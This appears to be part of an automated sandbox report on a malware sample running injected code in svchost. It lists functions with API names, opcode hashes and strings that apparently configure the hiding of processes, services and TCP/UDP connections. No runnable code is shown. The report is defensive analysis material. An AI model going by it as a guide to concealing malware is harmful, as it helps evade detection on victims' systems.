                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction ID: d3f0363712b424162af198fcb1f2ccd060454dcd3d61e37f8d2bcd7dd235890b
                                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction Fuzzy Hash: 55912632758F5485F76ADF65AC4BBAD3BA0F344B8AF144189DE0A57A94CF34D482C708
                                                                          Function 00000257E10A7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: a2a4f887a9f13fcddb2c7929769560035c01c8ba1ff43c4decbc8a8071c20252
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: CA113C22754F018AEB01CF60FC5A3A833A4F719759F440E21EA6D867A4DF78C1A8C380
                                                                          Function 00000257E10A253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction ID: d8c6a38f007fb3a7686c76c7a8283c4c2af24b0e33f9ff83396385155cc53d9c
                                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction Fuzzy Hash: 6F71E336288F8186E72EDE25BC5B3EE6B90F789B86F440066DD0A47B88DF34C641C714
                                                                          Function 00000257E1079E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: 72cc404f53ef2108c57ae6d6efccfd71c2e81a8e4ff4a0d360792559cd38555b
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: CD61AC33608F848AEB2AEF65E8463AD77A0F344B99F044655EF4A17B98DB38D095C704
                                                                          Function 00000257E10A2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction ID: f4fc28d39a0cdc524aee5adda2c2e0e63ac63cf0b53b223d59b02d2ca35e917c
                                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction Fuzzy Hash: 3E51063268CF8181F67EDE29B85F3AAA761F385781F440175DE9A03B49DE39C504C768
                                                                          Function 00000257E10B26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: 36eee36a702be5d229b17d9c9138d260910e3688b71927c4caf75304bb23e6ee
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: FE41A232359F8082EB26DF25F84A7AA77A0F798795F504021EE4D87794EB3CD441CB48
                                                                          Function 00000257E10A94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: e302ae30e49da29a726c6f913943f5073bbf1f5ae9d0972a697904f802fd5f1d
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: 55112B36219F8082EB668B25F84635977E5F788B95F584260EECD07758DF3CC551CB04
                                                                          Function 00000257E1077356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: 5c07be2ebc4b5c2c17967540651cfe820deff558361af11c6e94b5f60bbdcb6a
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: 5FE086A1684F4490DF078F21FC4629873A0EB59B64F499162995C0A311FA38D1F9C300
                                                                          Function 00000257E10773B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: 558cecf372c16398b9b2aefa91b5521037ba77d7552cbc05b4debd7ca50bbfaf
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: 65E086A1644F4490DF068F21E8421987360E759B54F889162C95C0A311EA38D1E5C300
                                                                          Function 00000257E10A1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: 2d0e3eb43654a43f3f6b80af6b512799269a4d278d6165dc18c830e96e57c320
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: F8118C25645F4882EA0ADB66F84B72973A1FB89FC2F184468DE8D47766DE38C442C304
                                                                          Function 00000257E10A1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: 8832b056897a9b8ba16723e3fafdb3eff0c8063a4678bd85c9cbe2902852df6c
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: 48E06535A41F0486EB09CF62EC0E74A36E1FB89F06F08C424C91907361DF7D8499CB90

                                                                          Executed Functions

                                                                          Function 000001F28C931268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: 8f8718106759883864cae2a8ca865240e286cea242c12ae6e8bb01d1b0de8f1e
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: F4E06DB5641E45C7EB048F62D8083AA3AE1FB8DF86F04C024C90907351DF7D8599C750
                                                                          Function 000001F28C93328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: b4d9601b441b195fc890c788491207d0644a6a96c7f54882ecefb715d9f87218
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: B7118471AD0EC382FB60A731F8053F922D4B7543C5F98A1BCD90E87995EF79C0458200
                                                                          Function 000001F28C931ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 000001F28C931628: GetProcessHeap.KERNEL32 ref: 000001F28C931633
                                                                            • Part of subcall function 000001F28C931628: HeapAlloc.KERNEL32 ref: 000001F28C931642
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9316B2
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9316DF
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9316F9
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931719
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931734
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931754
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C93176F
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C93178F
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9317AA
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9317CA
                                                                          • Sleep.KERNEL32 ref: 000001F28C931AD7
                                                                          • SleepEx.KERNELBASE ref: 000001F28C931ADD
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9317E5
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931805
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931820
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931840
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C93185B
                                                                            • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C93187B
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931896
                                                                            • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9318A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: b67c1932e62b7ac0013a9a1692b6bd7ceba26b73bf7a76d8ab9135420b3866fa
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: 81316871281EC292EB509B36DA512F963F5AB84BD4F0C74B1DE09876BAFF34C851C211
                                                                          Function 000001F28C933844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 62 1f28c933844-1f28c93384f 63 1f28c933869-1f28c933870 62->63 64 1f28c933851-1f28c933864 StrCmpNIW 62->64 64->63 65 1f28c933866 64->65 65->63
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: dialer
                                                                          • API String ID: 0-3528709123
                                                                          • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                          • Instruction ID: 35bd7b7e84aeabd97046de9deeb150375f1cc12c8c169a2c29cf3a1cf66da4a6
                                                                          • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                          • Instruction Fuzzy Hash: 3ED05E71391A8786FB149FA688C46B06390AB047C4F8C90B4CE0403550DB38C98E9610
                                                                          Function 000001F28C1D273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3294067605.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: f44ca3bbc8084d92389e86a6591f077caaf6d236089e246760dd531db40c924a
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: C761A172B41AA287DB988F1590807B97BD2F754BD4F588135DF6907788DB38ECA2C700
                                                                          Function 000001F28C93CA0C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AllocHeap
                                                                          • String ID:
                                                                          • API String ID: 4292702814-0
                                                                          • Opcode ID: aac0828ce12dfb82e5a667a172eb8e62085a22ffbd2f9ceececb1565634b64c0
                                                                          • Instruction ID: 37f6b4a35d52c06492a2f816035ee87f2c0b4da3a164c87f2d500a2a78e06805
                                                                          • Opcode Fuzzy Hash: aac0828ce12dfb82e5a667a172eb8e62085a22ffbd2f9ceececb1565634b64c0
                                                                          • Instruction Fuzzy Hash: 9CF085703A1EC385FA64A7B258113F612C04B88BE0F0CA3F0ED2AC72C2DB3C84808620

                                                                          Non-executed Functions

                                                                          Function 000001F28C932B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 390 1f28c932b2c-1f28c932ba5 call 1f28c952ce0 393 1f28c932bab-1f28c932bb1 390->393 394 1f28c932ee0-1f28c932f03 390->394 393->394 395 1f28c932bb7-1f28c932bba 393->395 395->394 396 1f28c932bc0-1f28c932bc3 395->396 396->394 397 1f28c932bc9-1f28c932bd9 GetModuleHandleA 396->397 398 1f28c932bed 397->398 399 1f28c932bdb-1f28c932beb call 1f28c946090 397->399 401 1f28c932bf0-1f28c932c0e 398->401 399->401 401->394 404 1f28c932c14-1f28c932c33 StrCmpNIW 401->404 404->394 405 1f28c932c39-1f28c932c3d 404->405 405->394 406 1f28c932c43-1f28c932c4d 405->406 406->394 407 1f28c932c53-1f28c932c5a 406->407 407->394 408 1f28c932c60-1f28c932c73 407->408 409 1f28c932c75-1f28c932c81 408->409 410 1f28c932c83 408->410 411 1f28c932c86-1f28c932c8a 409->411 410->411 412 1f28c932c8c-1f28c932c98 411->412 413 1f28c932c9a 411->413 414 1f28c932c9d-1f28c932ca7 412->414 413->414 415 1f28c932d9d-1f28c932da1 414->415 416 1f28c932cad-1f28c932cb0 414->416 417 1f28c932ed2-1f28c932eda 415->417 418 1f28c932da7-1f28c932daa 415->418 419 1f28c932cc2-1f28c932ccc 416->419 420 1f28c932cb2-1f28c932cbf call 1f28c93199c 416->420 417->394 417->408 421 1f28c932dac-1f28c932db8 call 1f28c93199c 418->421 422 1f28c932dbb-1f28c932dc5 418->422 424 1f28c932d00-1f28c932d0a 419->424 425 1f28c932cce-1f28c932cdb 419->425 420->419 421->422 429 1f28c932df5-1f28c932df8 422->429 430 1f28c932dc7-1f28c932dd4 422->430 426 1f28c932d0c-1f28c932d19 424->426 427 1f28c932d3a-1f28c932d3d 424->427 425->424 432 1f28c932cdd-1f28c932cea 425->432 426->427 433 1f28c932d1b-1f28c932d28 426->433 434 1f28c932d4b-1f28c932d58 lstrlenW 427->434 435 1f28c932d3f-1f28c932d49 call 1f28c931bbc 427->435 438 1f28c932e05-1f28c932e12 lstrlenW 429->438 439 1f28c932dfa-1f28c932e03 call 1f28c931bbc 429->439 430->429 437 1f28c932dd6-1f28c932de3 430->437 440 1f28c932ced-1f28c932cf3 432->440 443 1f28c932d2b-1f28c932d31 433->443 445 1f28c932d7b-1f28c932d8d call 1f28c933844 434->445 446 1f28c932d5a-1f28c932d64 434->446 435->434 449 1f28c932d93-1f28c932d98 435->449 447 1f28c932de6-1f28c932dec 437->447 441 1f28c932e35-1f28c932e3f call 1f28c933844 438->441 442 1f28c932e14-1f28c932e1e 438->442 439->438 457 1f28c932e4a-1f28c932e55 439->457 440->449 450 1f28c932cf9-1f28c932cfe 440->450 452 1f28c932e42-1f28c932e44 441->452 442->441 451 1f28c932e20-1f28c932e33 call 1f28c93152c 442->451 443->449 453 1f28c932d33-1f28c932d38 443->453 445->449 445->452 446->445 456 1f28c932d66-1f28c932d79 call 1f28c93152c 446->456 447->457 458 1f28c932dee-1f28c932df3 447->458 449->452 450->424 450->440 451->441 451->457 452->417 452->457 453->427 453->443 456->445 456->449 464 1f28c932e57-1f28c932e5b 457->464 465 1f28c932ecc-1f28c932ed0 457->465 458->429 458->447 468 1f28c932e63-1f28c932e7d call 1f28c9385c0 464->468 469 1f28c932e5d-1f28c932e61 464->469 465->417 471 1f28c932e80-1f28c932e83 468->471 469->468 469->471 473 1f28c932e85-1f28c932ea3 call 1f28c9385c0 471->473 474 1f28c932ea6-1f28c932ea9 471->474 473->474 474->465 477 1f28c932eab-1f28c932ec9 call 1f28c9385c0 474->477 477->465
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction ID: 5ddfa2ae8d86f9d74b9217bdca104cd19bacd61b75c306f4a54b144b8a2605f5
                                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction Fuzzy Hash: A3B16776250ED286EB698F35D4417F963E5FB44BC4F4860B6EE0997BA6EB35C880C340
                                                                          Function 000001F28C937D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: 315950f2970cd4e23eb0bb7edb8b7cf3ceedc3dc3316b9e43c8c6da18fa3bab3
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: C2313B72245FC19AEB609F60E8807FD73A5F784788F48446ADA4E57B98EF38C648C710
                                                                          Function 000001F28C93D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: de600b675c99b63b07bfc61b3ea15e563d1fd6e5409b2fafadfe2c025ff4e9af
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: B7316672254FC196EB608B25E8803FE73A4F789798F540166EA9D43BA8EF38C545CB00
                                                                          Function 000001F28C931628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: c2eb12f427962f4a473e0d6cdd6568ad5d847194dadf60defaa1d10753933b52
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: A871D676250E92C6EB209F76E8906F923E4FB84BCDF046161DE4E57A69EF38C444C744
                                                                          Function 000001F28C9312BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
